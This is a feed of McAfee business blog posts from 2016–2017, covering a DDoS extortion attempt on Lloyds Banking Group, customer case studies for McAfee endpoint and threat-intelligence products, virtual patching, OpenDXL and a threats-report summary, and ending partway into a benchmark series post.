Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/ https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/#comments Mon, 30 Jan 2017 18:51:59 +0000 https://securingtomorrow.mcafee.com/?p=68609 This blog was written by Maneeza Malik. In the matter of 48 hours, over 20 million customers couldn’t check their  bank accounts online. And it’s all because of two people. Two cybercriminals, to be exact, who worked in tandem to conduct a DDoS (distributed denial of service) attack against Lloyds Banking Group. The end goal? […]

The post Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals appeared first on McAfee Blogs.

]]>
This blog was written by Maneeza Malik.

In the matter of 48 hours, over 20 million customers couldn’t check their  bank accounts online. And it’s all because of two people. Two cybercriminals, to be exact, who worked in tandem to conduct a DDoS (distributed denial of service) attack against Lloyds Banking Group. The end goal? Demand a ransom from the banking group, which they knew would be desperate to restore access back to its irritated customers.

 So how exactly did this DDoS attack work? To start, the cybercriminals bombarded the widely-used British bank’s online platform with millions of fake requests designed to grind the group’s systems to a halt. That halt managed to last almost three days, denying access to millions upon millions of customers across the U.K.

Then, the pair sent an email to a Lloyds Bank executive, pretending to be a consultant offering to restore the bank’s system and get it back online for a small fare of 100 Bitcoin (£75,000 / $94,000). Luckily, the disguised ransom extortion failed, as the cybercriminals’ bitcoin address still has zero balance with zero transactions made. As an added bonus, it seems no accounts were hacked or compromised during the attack, and service has returned back to normal.

Lloyds IT security experts are to thank for that, who “geo-blocked” the source of the attack, which is a security technique that effectively drops a portcullis over the server launching the attacks but also stopped legitimate customer requests from that area, too.

Though no customer data has been stolen and service is back online, this cyberattack is an unfriendly reminder about the nature of DDoS attacks, their ability, and their true impact.

Joe Bernik, McAfee CTO for Financial Services, noted that the attack is nothing new, but attacks like it aren’t going anywhere. “As one of the oldest forms of internet-borne attacks, DDoS attacks are effective and popular because the internet architecture and protocols it uses easily lend themselves to this form of attack. Therefore, it makes sense that the attack on Lloyds’ banking platform is similar to the DDoS attacks that impacted large U.S. banks in 2013 and 2014 as well.”

Bernik continued, “Adding to this ease, DDoS attacks are highly visible by nature, and easy to perform, given the availability of ‘for hire’ botnets.  It’s also important to remember that—especially in cases like Lloyds Bank—a DDoS attempt can be part of a larger attack and could just be a detractor used to redirect security resources.”

Indeed, such attacks are something all banks need to be aware of in order to be on high alert. They need to look for threats and evasive attacks across their entire network and across all omni-banking touch points.

There is nothing unique here.  Yes DDOs attacks are here to stay.  As are cyber threats/attacks of all sorts. The bigger question is….banks need to shift their security posture to take a more offensive stance and not only be at the other end of the fire hose.  Granted that’s easier said than done.  They also need greater visibility “holistic view” into their security posture versus multiple myopic lenses that may hamper the ability to proactively detect and block attacks.  What did we learn about this attack on Lloyds bank….that customers started to report that they could not access their accounts which then triggered an alert.  Detecting and blocking attacks on the onset will continue to be both a challenge and a desired goal for banks. Whether it’s a DDos attack, zero-day attack or some other form of evolving and emerging threat.

The post Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/feed/ 4
Fortune 500 Company’s Information Security Team Saves 20 Hours Each Week by Migrating to McAfee Endpoint Security https://securingtomorrow.mcafee.com/business/fortune-500-companys-information-security-team-saves-20-hours-week-migrating-mcafee-endpoint-security/ https://securingtomorrow.mcafee.com/business/fortune-500-companys-information-security-team-saves-20-hours-week-migrating-mcafee-endpoint-security/#respond Thu, 19 Jan 2017 20:13:15 +0000 https://securingtomorrow.mcafee.com/?p=68081 For HollyFrontier Director of IT Infrastructure Edwin Drayden, the primary driver for migrating to McAfee Endpoint Security 10 was not better performance or consolidation of legacy products. It was the ability to integrate new endpoint protection framework with his favorite McAfee product, McAfee Advanced Threat Defense (ATD) dynamic sandboxing. Under Drayden’s leadership, HollyFrontier, a Fortune […]

The post Fortune 500 Company’s Information Security Team Saves 20 Hours Each Week by Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
For HollyFrontier Director of IT Infrastructure Edwin Drayden, the primary driver for migrating to McAfee Endpoint Security 10 was not better performance or consolidation of legacy products. It was the ability to integrate new endpoint protection framework with his favorite McAfee product, McAfee Advanced Threat Defense (ATD) dynamic sandboxing.

Under Drayden’s leadership, HollyFrontier, a Fortune 500 petroleum refining company with five refineries in the mid-United States, recently migrated 90 percent of its 3,600 McAfee Complete Endpoint Threat Protection suite nodes to McAfee Endpoint Security 10.2. Drayden knew that the more intelligent, more collaborative McAfee Endpoint Security would enhance the defenses of the company’s integrated security architecture, in which McAfee SIEM, IPS, and other solutions play key roles. But he was most excited about the stronger threat detection and faster response enabled by integrating the new endpoint protection framework with McAfee ATD via McAfee Threat Intelligence Exchange.

Drayden becomes animated when he talks about McAfee ATD: “It’s awesome to be able to see something a little strange from a packet perspective…[and be] able to take it to the cloud and explode it, to see what kind of threat vectors fit… I love that. And to do it in such a short timeframe; it’s really incredible.”

At HollyFrontier, now that McAfee Endpoint Security is integrated with McAfee Threat Intelligence Exchange and McAfee ATD (via the Data Exchange Layer, or DXL), if a questionable file attempts to execute on an endpoint, it is instantly quarantined and sent to ATD for deep analysis. While ATD is analyzing the file—combining signatures, reputation, and real-time emulation with in-depth sandboxing to detect sophisticated, evasive threats—the Dynamic Application Containment (DAC) capability of McAfee Endpoint Security 10 automatically isolates the file in question at ‘patient zero.’

As Drayden had anticipated, this integration of McAfee Endpoint Security and McAfee ATD has indeed had a tremendous positive impact on security operations, especially by detecting and containing ransomware before it requires serious remediation. “There were quite a few instances in our environment of ransomware that no longer exist,” says Drayden. “I’d say that’s easily 40 hours [saved] every two weeks.”

Drayden also expresses pleasure at how simple and straightforward the migration to McAfee Endpoint Security was using the McAfee ePolicy Orchestrator® (ePO™) central console. Within seven days after initial testing, HollyFrontier’s small information security staff migrated to version 10.2 of the new endpoint protection framework and its Threat Prevention module, including Dynamic Application Containment (DAC) functionality, across 3,200 nodes. The company plans to migrate to version 10.5 within 30 days.

RCB Pull Quote (1)

In addition, migrating to the McAfee Endpoint Security 10 had minimal impact on end users, who either didn’t notice anything had changed or ceased complaining. “Once [the migration] was done, it was done,” Drayden notes. “It’s been pretty quiet ever since [across] literally every single endpoint in the whole infrastructure.”

In sum, says Drayden, HollyFrontier migrated to McAfee Endpoint Security 10 “to get a quality product and watch it attach upstream to everything else.” Once it was deployed, he says, “I felt better; I could sleep at night because I knew that ENS [McAfee Endpoint Security 10] works.”

To watch a short video of Drayden sharing about his experience with ENS and McAfee, click here and get your questions answered by tweeting @McAfee_Business.

The post Fortune 500 Company’s Information Security Team Saves 20 Hours Each Week by Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/fortune-500-companys-information-security-team-saves-20-hours-week-migrating-mcafee-endpoint-security/feed/ 0
A New Year with No Patch Management Hangover https://securingtomorrow.mcafee.com/business/cloud-security/new-year-no-patch-management-hangover/ https://securingtomorrow.mcafee.com/business/cloud-security/new-year-no-patch-management-hangover/#respond Tue, 17 Jan 2017 14:00:10 +0000 https://securingtomorrow.mcafee.com/?p=67774 This blog post was written by Teresa Wingfield. The frequency of database and application vulnerabilities is increasing.  Testing and deploying vendor-issued patches is an ongoing, arduous process that results in a time window of system vulnerabilities that exists until IT staff can bring business-critical databases and applications off-line and deploy patches. The longer the vulnerability […]

The post A New Year with No Patch Management Hangover appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

The frequency of database and application vulnerabilities is increasing.  Testing and deploying vendor-issued patches is an ongoing, arduous process that results in a time window of system vulnerabilities that exists until IT staff can bring business-critical databases and applications off-line and deploy patches. The longer the vulnerability window the greater the security risk.

Traditional Patch Management Challenges

With the growth of vulnerabilities, many organizations struggle when using traditional patch management strategies for remediation.   Our new white paper from Aberdeen Group, “Beyond the Patch: Reducing the Risk of Database and Application Vulnerabilities” identifies the key shortcomings of traditional patch management that make remediation so painful:

  • Vendor patches may not be available
  • Vendor patching may not be possible or practical
  • Vendor patching is costly, time consuming and inconvenient
  • Vendor patching does not support up-to-date visibility into what’s happening in your environment

In fact, Aberdeen found that in a $100 million company with 100 database instances, vendor  patching over the course of one year is likely to be complex and time consuming. dbpatchingstatsA Virtual Patching Strategy

This New Year you may want to try a different patch management approach.  In comparison to traditional vendor patching, virtual patching can be a highly effective strategy for addressing both the likelihood and business impact aspects of security-related risk.  Aberdeen defines virtual patching as establishing a policy enforcement point that is external to the resource being protected to identify vulnerability exploits before they reach their target.  Virtual patch management offers the following benefits:

  • Automatic updates since direct modifications to resources being protected are not required.
  • Reduced risk since virtual patching reduces the window of vulnerability when vendor patching is not available, not possible, not practical, or deferred to avoid cost and inconvenience.
  • Lowers business impact because virtual patching reduces lost user productivity and lost revenue during the time that databases and applications are disrupted by traditional vendor patching.

A Virtual Patching Solution

McAfee Virtual Patching for Databases shields databases from the risk presented by unpatched vulnerabilities by detecting and preventing attempted attacks and intrusions in real time without requiring database downtime or application testing. This virtual patching solution also helps you continue to protect databases running old database management system (DBMS) versions that are no longer supported by the vendor, adding to the useful life of legacy databases and saving your organization time and money.

McAfee Virtual Patching Advantages

  • Gain protection from threats even before installing vendor released patch updates
  • Eliminate the need for IT and security teams to have DBMS–knowledge
  • Keep production databases online, thanks to non-intrusive software design
  • Protect databases seamlessly with automatic distribution of ongoing updates
  • Facilitate compliance with standards such as PCI DSS, HIPAA, and others

 

The post A New Year with No Patch Management Hangover appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/new-year-no-patch-management-hangover/feed/ 0
CIO Blown Away with Migration to McAfee Endpoint Security 10.2 https://securingtomorrow.mcafee.com/business/cio-blown-away-migration-mcafee-endpoint-security-10-2/ https://securingtomorrow.mcafee.com/business/cio-blown-away-migration-mcafee-endpoint-security-10-2/#respond Thu, 05 Jan 2017 17:37:26 +0000 https://securingtomorrow.mcafee.com/?p=67675 Intrigued by McAfee Endpoint Security framework, the new more collaborative endpoint protection with dramatically improved performance, threat remediation, intelligence, and forensics? Wondering if you should migrate from your existing endpoint protection? CIO Harry Folloder was too, but no longer. Folloder heads information security at Waypoint, the leading food services sales and marketing company for North […]

The post CIO Blown Away with Migration to McAfee Endpoint Security 10.2 appeared first on McAfee Blogs.

]]>
Intrigued by McAfee Endpoint Security framework, the new more collaborative endpoint protection with dramatically improved performance, threat remediation, intelligence, and forensics? Wondering if you should migrate from your existing endpoint protection?
CIO Harry Folloder was too, but no longer.

Folloder heads information security at Waypoint, the leading food services sales and marketing company for North America. The potential benefits of McAfee Endpoint Security 10, including better performance and faster, easier threat remediation, drove him to migrate from a previous McAfee endpoint suite sooner rather than later, and to renew Waypoint’s endpoint contract with McAfee for multiple years.

Under Folloder’s leadership, Waypoint recently deployed McAfee Endpoint Security 10.2 across the company’s approximately 1,500 endpoints, including three geographically dispersed data centers. Migration took only a few days and was very straightforward using McAfee ePolicy Orchestrator (ePO). Folloder, his staff, and end users are all extremely pleased with the result.

Folloder’s staff was particularly impressed with the upgraded endpoint protection’s additional actionable intelligence and forensics and enhanced graphical user interface, which presents actionable threat forensics in easily understood language. “We were just blown away by the intricate detail of the user experience, from the end user computing side but also from the admin side,” says Folloder. “[The new McAfee endpoint security framework] makes it easier for us to manage the endpoint and take corrective action.”

screen-shot-2017-01-05-at-9-08-22-am

For Folloder, even more important than easy administration is improved ability to protect clients—corporate users as well as users at the companies that hire Waypoint’s services and deploy the company’s ATMs. All these users trust Folloder and his staff for the safety of their data and lines of business.

“My staff feels more comfortable with the security that [McAfee Endpoint Security] provides their teams and those we are charged with protecting,” declares Folloder. He says that the new McAfee endpoint security framework is easier to manage, provides more visibility, and is more stable. In addition, because it requires substantially less CPU resources to run and does not impact business operations, it has improved the computing experience of Waypoint’s end users.

“So for all those reasons we are very happy with [McAfee Endpoint Security 10],” concludes Folloder. He also adds that CIOs should partner with McAfee because McAfee is not only a leader but an innovator in technology. The new McAfee Endpoint Security framework is but one example.

To hear Folloder talk about his experience with McAfee Endpoint Security 10.2, click here.

 

 

The post CIO Blown Away with Migration to McAfee Endpoint Security 10.2 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cio-blown-away-migration-mcafee-endpoint-security-10-2/feed/ 0
New OpenDXL Clients released! Integrations Improve Endpoint Detection and Response, Intelligence Sharing, and Action Across Applications https://securingtomorrow.mcafee.com/business/new-opendxl-clients-released-integrations-improve-endpoint-detection-response-intelligence-sharing-action-across-applications/ https://securingtomorrow.mcafee.com/business/new-opendxl-clients-released-integrations-improve-endpoint-detection-response-intelligence-sharing-action-across-applications/#respond Thu, 05 Jan 2017 14:00:25 +0000 https://securingtomorrow.mcafee.com/?p=67606 This blog was written by Barbara Kay. Finding new ways to extract more value from security operations is a hot priority for most CISOs and security architects as they progress toward the goal of a proactive and optimized security operation. But according to our research, 26% of security operations centers (SOCs) still operate in reactive […]

The post New OpenDXL Clients released! Integrations Improve Endpoint Detection and Response, Intelligence Sharing, and Action Across Applications appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

Finding new ways to extract more value from security operations is a hot priority for most CISOs and security architects as they progress toward the goal of a proactive and optimized security operation. But according to our research, 26% of security operations centers (SOCs) still operate in reactive mode, with ad hoc approaches to security operations, threat hunting, and incident response. A fair amount of time is spent on scripting, log collection, and data manipulation, followed by propagating their assessment to the operational teams that need to act.

Often, the same sequence happens the next day with another endpoint or event and another analyst. The untold story is that analysts don’t have an easy way to integrate data and processes across tools, and then to make these tasks repeatable.

For example, how much time would you budget to integrate six products from 4 vendors to link countermeasures (firewall), investigation tools (endpoint detection and response), and remediation tools (vulnerability management and network access control)? Months? That’s if you can get access to the APIs.

New OpenDXL Clients Expedite Integration

With the release on github of OpenDXL clients for McAfee Active Response (MAR) and McAfee Threat Intelligence Exchange (TIE), we have added more software to work with the open source OpenDXL Python client to orchestrate security. For any of you not familiar with OpenDXL, it provides an open, simple way to integrate technologies from different vendors with each other and with in-house developed applications. Enterprises get new, timely access to incredibly critical security intelligence and context and can connect apps and processes into consistent and automated workflows. Learn more here.

The two new Python clients simplify accessing the existing MAR and TIE DXL services. This approach insulates developers from needing to know MAR- or TIE-specific DXL topics and message formats. Digging into the MAR example, the engineering team illustrates the value of creating easy to use DXL services. For the demo I mentioned, they wanted to connect McAfee products with Check Point, Rapid 7, and HP Aruba products. Rather than creating one-off native OpenDXL integrations for each of these three apps, the engineers did two things; they created service wrappers for the non-DXL integrated products, and new, easy-to-use Python clients for Active Response and MAR.

The service wrappers enable non-DXL integrated APIs of Rapid 7 and HP Aruba functionality to be called via DXL. Service wrappers are the means for integrating data and processes across tools. [I will go into this more in a future blog, or you can learn more now at github.com/opendxl.]

The new Python clients simplify the process of querying endpoints in your environment, reducing the effort from 120 lines of code (with pure OpenDXL) to 20 lines of code (with the MAR Python client).

The next new application that wants to search an endpoint—perhaps yours?—will also require just 20 lines of code.  See for yourself how simple the integration is. Two sample search code files are here on Github:

There’s untapped potential for efficiency and better ideas as companies start using these capabilities with the OpenDXL SDK. Please learn more at www.mcafee.com/dxl and join the conversation on our community site.

The post New OpenDXL Clients released! Integrations Improve Endpoint Detection and Response, Intelligence Sharing, and Action Across Applications appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-opendxl-clients-released-integrations-improve-endpoint-detection-response-intelligence-sharing-action-across-applications/feed/ 0
How McAfee Evolved A Software Company’s Security System to Combat Today’s Threats https://securingtomorrow.mcafee.com/business/mcafee-evolved-software-companys-security-system-combat-todays-threats/ https://securingtomorrow.mcafee.com/business/mcafee-evolved-software-companys-security-system-combat-todays-threats/#respond Thu, 22 Dec 2016 16:00:55 +0000 https://securingtomorrow.mcafee.com/?p=67368 To Nirdosh Kumar, the lead security administrator at a global software company, cybersecurity is evolving.  “You cannot think of all the preventions,” Kumar explained, “hackers are knowledgeable.” And since his company needed to keep pace with these intelligent cybercriminals to stay secure, their focus had to change. They decided to move beyond only relying on […]

The post How McAfee Evolved A Software Company’s Security System to Combat Today’s Threats appeared first on McAfee Blogs.

]]>
To Nirdosh Kumar, the lead security administrator at a global software company, cybersecurity is evolving.  “You cannot think of all the preventions,” Kumar explained, “hackers are knowledgeable.” And since his company needed to keep pace with these intelligent cybercriminals to stay secure, their focus had to change. They decided to move beyond only relying on prevention, and instead began to turn their attention towards detection.

To achieve these detection goals, the cloud based software company put their trust in an end-to-end solution from McAfee, knowing it could provide the most comprehensive protection for their entire company.

To start achieving this better level of security, the software company began with McAfee ePO Cloud console as the main core of their system, as well as McAfee AntiVirus, McAfee Disk Encryption, and McAFee MOVE AntiVirus— the newest software for cloud infrastructures.  MOVE AntiVirus provided them with advanced malware protection for their virtual environment all while conducting regular security scans as well.

In addition to increased detection, Kumar also noted the important impact of an interconnected security system.  He stated, “security products need to talk to each other.” Therefore, in order to achieve this connected approach, the software company utilized McAfee DXL and McAfee TIE. Working in conjunction, both of these solutions combined multiple threat information sources and shared that information with all connected security platforms. Pleased with such openness, Kumar noted, “with TIE and DXL, I love how all things are connected now, even third party products are connected.”

This interconnected system allowed the software company to thrive– they finally felt like they were evolving and were able to combat ever-changing security threats. As Kumar said himself, “we are going into the right direction.”

 

The post How McAfee Evolved A Software Company’s Security System to Combat Today’s Threats appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-evolved-software-companys-security-system-combat-todays-threats/feed/ 0
New Server Security Release Makes Borderless Cloud Security a Reality https://securingtomorrow.mcafee.com/business/cloud-security/new-server-security-release-makes-borderless-cloud-security-reality/ https://securingtomorrow.mcafee.com/business/cloud-security/new-server-security-release-makes-borderless-cloud-security-reality/#respond Thu, 15 Dec 2016 14:00:05 +0000 https://securingtomorrow.mcafee.com/?p=66621 This blog post was written by Teresa Wingfield. Cloud Workload Discovery, first announced in July 2016, covered Amazon Web Services (AWS) and Microsoft Azure. Cloud Workload Discovery for hybrid cloud, available on December 19, 2016, extends coverage to VMware and OpenStack private clouds. As the hybrid data center expands, tracking down the blind spots keeps getting […]

The post New Server Security Release Makes Borderless Cloud Security a Reality appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

Cloud Workload Discovery, first announced in July 2016, covered Amazon Web Services (AWS) and Microsoft Azure. Cloud Workload Discovery for hybrid cloud, available on December 19, 2016, extends coverage to VMware and OpenStack private clouds.

As the hybrid data center expands, tracking down the blind spots keeps getting harder.  Organizations struggle to assess their end-to-end security posture for workloads and platforms, monitor and protect workloads across all clouds and maintain regulatory compliance.

Cloud Workload Discovery for hybrid clouds provides end-to-end visibility into all workloads and their underlying platforms to make borderless cloud security a reality.  With deep visibility, assessment and remediation for compute, storage, and network as shown in the diagram below, organizations are able to assess end-to-end security posture (workloads and platforms), monitor and protect workloads across all private and public clouds and maintain regulatory compliance.

Cloud Workload Discovery for Hybrid Cloud
                                    Cloud Workload Discovery for Hybrid Cloud 

How Cloud Workload Discovery Works

Cloud Workload Discovery for hvbrid cloud provides three main capabilities:

  • Discovery of weak security controls for VMware, OpenStack, AWS and Microsoft Azure
  • Platform security audit, including firewall and encryption settings, for AWS and Microsoft Azure
  • Traffic and network threat visibility for AWS.

These insights lead to faster detection while while McAfee® ePolicy Orchestrator® (McAfee ePOTM)  or DevOps tools such as Chef, Puppet, and OpsWorks enable quick remediation.

Cloud Workload Discovery’s integration with McAfee ePO, a single management platform with simplified workflows, gives organizations effective control to help implement security solutions across physical, virtual and cloud environments.  Since Cloud Workload Discovery is agentless and powered by API integration with cloud providers, security administrators just enter their cloud account credentials in McAfee ePO to instantly discover workloads, address threat alerts and enforce policies.   Quick time to value and a low learning curve mean that you can significantly improve your cloud workload security with minimal involvement from your IT Security team.

Learn More

For more details on Cloud Workload Discovery, click here.

Also, check out our three Cloud Workload Discovery options that we offer to meet your cloud security requirements:

The post New Server Security Release Makes Borderless Cloud Security a Reality appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/new-server-security-release-makes-borderless-cloud-security-reality/feed/ 0
McAfee Labs December Threats Report Explores Many Facets of Deception https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-december-threats-report-explores-many-facets-deception/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-december-threats-report-explores-many-facets-deception/#respond Tue, 13 Dec 2016 05:01:55 +0000 https://securingtomorrow.mcafee.com/?p=67017 This blog post was written by Vincent Weafer. In the McAfee Labs Threats Report: December 2016 published today, we write about three seemingly disparate topics. However, on closer inspection, they have a common thread. All discuss deception in one way or another, whether ways in which ransomware authors have enhanced their code to sidestep sandboxes, […]

The post McAfee Labs December Threats Report Explores Many Facets of Deception appeared first on McAfee Blogs.

]]>
This blog post was written by Vincent Weafer.

In the McAfee Labs Threats Report: December 2016 published today, we write about three seemingly disparate topics. However, on closer inspection, they have a common thread. All discuss deception in one way or another, whether ways in which ransomware authors have enhanced their code to sidestep sandboxes, how Trojans infect legitimate code to appear benign, or the challenges SOCs face as they try to detect potential attacks from malware that uses increasingly sophisticated evasion techniques.

In the ransomware story, we summarize “the year in ransomware,” as that form of threat saw a huge jump in the number of ransomware attacks; it captured most of the cyberattack headlines. To fuel its growth, ransomware authors made many technical advances this year:

  • Anti-sandboxing: Detecting and evading security sandboxes used to test suspicious code.
  • Exploit kits: A cat-and-mouse game of increasing exploit kit sophistication to stay ahead of defenses.
  • Disk encryption: Partial disk encryption that overwrites the master boot record and full disk encryption that encrypts a compete partition.
  • Website encryption: Encryption of websites used by legitimate applications, making the apps useless until the site is decrypted.
  • Ransomware-as-a-service: Attackers pay service providers for the use of infrastructure and ransomware.

The good news is that the white hats are fighting back, with some success. Defenses are getting better, law enforcement and security vendors are collaborating to take down ransomware networks, and a jointly founded initiative, No More Ransom!, was formed to provide prevention advice, investigation assistance, and decryption tools. More than one dozen law enforcement agencies and multiple security technology vendors are now part of the No More Ransom! collaboration, with more to come in the very near future!

To learn more about defending against ransomware, read our Technical Brief How to Protect Against Ransomware. More information about ransomware and ways to protect against it can be found here.

 

The Trojan story explains how this type of malware infects legitimate code and hides out, hoping to go unnoticed as long as possible to maximize payouts. We show how attackers create long-lasting, fully undetectable malware by modifying source code or executables, inserting patches on the fly through man-in-the-middle attacks, or tricking application authors to include malicious libraries.

Attackers who specialize in Trojans enjoy an impression of legitimacy, as their malware hides behind recognized brands or apps. The “Trojanized” legitimate apps often provide cover during security scans and forensic analysis. And the Trojans enjoy free persistence, courtesy of app users who depend on the apps for day-to-day activities.

To learn more about defending against Trojanized legitimate software, read our Solution Brief How to Protect Against Trojans.

 

Our third story is about security operations centers, or SOCs. McAfee commissioned a primary research study to gain a deeper understanding of the ways in which enterprises use security operations centers, how they have changed over time, and what they will look like in the future.

Among other things, we learned of:

  • Alert overload: SOC managers are unable to sufficiently investigate 25% of their security alerts.
  • Triage trouble: 93% of SOC managers are overwhelmed by alerts and unable to triage all potential threats.
  • Incidents on the rise: 67% of SOC managers report an increase in security incidents.
  • Proactive vs. reactive: 26% of SOCs operate in a reactive mode with ad-hoc approaches to security operations, threat hunting, and incident response.
  • Highest priority for SOCs growth and investment: SOC owners want to improve their ability to respond to confirmed attacks, which includes the ability to coordinate, remediate, eradicate, learn, and prevent recurrences.

To learn how to optimize security operations centers, read our white paper Sustainable Security Operations.

 

Finally, we highlight significant threat activity and statistics for Q3.

  • Malware: McAfee Labs measured 245 new threats every minute, or more than four every second. New malware dropped 21% in Q3, but total malware has grown 29% in the past year.
  • Ransomware: Total ransomware grew by 18% in Q3 and 80% since the beginning of the year.
  • Mobile malware: There were two million new mobile malware threats in Q3, the highest ever recorded. Total mobile malware has grown 138% in the past year.
  • Mac OS malware: New Mac OS malware skyrocketed by 637% in Q3, but the increase was due primarily to a single adware family, Bundlore.
  • Macro malware: New Microsoft Office macro malware continued the increase first seen in Q2. Total macro malware has grown 115% since the beginning of 2016.

 

For more information on these key topics, or more threat landscape statistics for Q3 2016, click here.

 

The post McAfee Labs December Threats Report Explores Many Facets of Deception appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-december-threats-report-explores-many-facets-deception/feed/ 0
How McAfee Threat Intelligence Exchange Aids in Saving Money and Saving Lives https://securingtomorrow.mcafee.com/business/mcafee-threat-intelligence-exchange-aids-saving-money-saving-lives/ https://securingtomorrow.mcafee.com/business/mcafee-threat-intelligence-exchange-aids-saving-money-saving-lives/#respond Thu, 08 Dec 2016 18:15:08 +0000 https://securingtomorrow.mcafee.com/?p=66949 For Kirk Davis, Director of Information Security at Vidant Health, tough days at work feature security events big and small. One especially tough day was when the North Carolina not-for-profit healthcare company was attacked by a Cryptowall Trojan that was able to encrypt half a million files before his team could respond. Soon enough, these […]

The post How McAfee Threat Intelligence Exchange Aids in Saving Money and Saving Lives appeared first on McAfee Blogs.

]]>
For Kirk Davis, Director of Information Security at Vidant Health, tough days at work feature security events big and small. One especially tough day was when the North Carolina not-for-profit healthcare company was attacked by a Cryptowall Trojan that was able to encrypt half a million files before his team could respond. Soon enough, these tough days began to get in the in the way of his desired work — helping improve clinical workflows that would better patient care.

And since his time was being poorly spent cleaning up after these attacks, Davis wanted to find a way to become both proactive and efficient. He noted, “how fast we consolidate events and alerts and get actionable information can be the critical difference between very positive and very negative outcomes.” Knowing he needed to eliminate the amount of noise within Vidant Health’s security environment to create positive outcomes, Davis decided to survey the market for a cohesive, automated security system.

After an extensive search, Davis and the Vidant Health team selected McAfee to act as the backbone behind their patient-centered business and to help them grow. To accomplish this feat, they selected the McAfee SIEM solution, McAfee Enterprise Security Manager, and its McAfee Advanced Correlation Engine, as well as McAfee Advanced Threat Defense and McAfee Threat Intelligence Exchange.

First leveraging the McAfee Data Exchange Layer, the McAfee Threat Intelligence Exchange combines internal and external threat information sources to instantly share this data with all of the organization’s other connected security solutions. Vidant Health then uses McAfee’s SIEM and Advanced Correlation Engine to identify and score threat events in real time.

The healthcare company soon saw a drastic change with this newly interconnected system, as Davis says, “within days of deployment we were ingesting Netflow information from a wide range of sources, sharing context and threat intelligence, and picking up an amazing amount of actionable data”. And since Vidant Health deployed McAfee Advanced Threat Defense and McAfee Threat Intelligence Exchange, they also started catching malware of all variants, including the particularly effective Cryptowall kind.

Besides catching these larger threats, Davis and his team more importantly got to fix “patient zero”, the first infected device, by finally being able to quarantine and treat it. In fact, Davis plans on using this technique on all future infected devices– isolating them immediately and pushing out remediation via the McAfee ePO central console.

And since his McAfee system is automated, the platform leaves room to accomplish bigger and better goals, as Davis notes, it “allows us to not worry about the things that can best be handled by computers and focus on the things we do best…we have been freed up to add value in other areas where it supports the business.”

In addition to freeing up time and other valuable resources, the McAfee interconnected system also frees up funds, as spending less time on remediation leads to costs savings. Davis even asserted, “I would say that McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense paid for themselves within the first six months.”

And though saving funds and sharing threat intelligence among all devices secures and strengthens Vidant Health now, Davis knows that adaptability will remain pertinent when combating threats in the future. He states, “moving forward, we will be focused much more keenly on ensuring that we have an environment that can learn and automatically remediate threats when they do happen. Without a doubt, the most valuable aspect of the McAfee SIEM and integrated framework is its adaptability and flexibility.” This adaptable framework, along with the McAfee ePO software acting as the backbone of this entire system, makes the McAfee system not only keep pace with Davis’ business but also adapt to its ever-changing needs.

This flexibility was one of the many factors that made Vidant Health feel like they had a found a great business partner in McAfee– one that understands how every dollar spent ends up on a patient’s bill and has to translate into value, ultimately, for their patients. A business partner, they also noted, that has created a competitive advantage for them as an organization.

With that advantage, Vidant Health has been able to accomplish their ultimate goal – keeping people healthy. Davis adds that now “my team dedicates itself every day to doing whatever we can do to improve the health of the 1.4 million people we serve here in eastern North Carolina. It’s a great feeling to know that what we have accomplished through our partnership with McAfee has supported us in that objective.”

To read the full case study, click here and get your questions answered by tweeting @McAfee_Business. To watch the two Vidant Health videos, click here and here.

The post How McAfee Threat Intelligence Exchange Aids in Saving Money and Saving Lives appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-threat-intelligence-exchange-aids-saving-money-saving-lives/feed/ 0
Who Let the Data Out? Who, Who, Who, Who? (Part 3 of 3) https://securingtomorrow.mcafee.com/business/data-security/who-let-the-data-out-who-who-who-who/ https://securingtomorrow.mcafee.com/business/data-security/who-let-the-data-out-who-who-who-who/#respond Tue, 29 Nov 2016 17:26:16 +0000 https://securingtomorrow.mcafee.com/?p=66702 It feels like the last song of the concert—this is the final blog in our cybersecurity benchmark series! As every good detective starts with information, we’ve been digging into the classic six “w” questions: who, what, when, where, why, and how. To find those answers for security professionals, data was combined from Ponemon Institute’s global […]

The post Who Let the Data Out? Who, Who, Who, Who? (Part 3 of 3) appeared first on McAfee Blogs.

]]>
It feels like the last song of the concert—this is the final blog in our cybersecurity benchmark series! As every good detective starts with information, we’ve been digging into the classic six “w” questions: who, what, when, where, why, and how. To find those answers for security professionals, data was combined from Ponemon Institute’s global survey of IT decision makers, the Verizon DBIR, and Grand Theft Data: 2015 McAfee Data Exfiltration Study.

If you’re just tuning in, catch up on our previous blogs. Now we’ll turn our attention to assess how cybersecurity teams are performing and areas for improvement. It’s also the last of our security-related song titles, so get ready for the final countdown!

A Hard Day’s Cybersecurity Focus

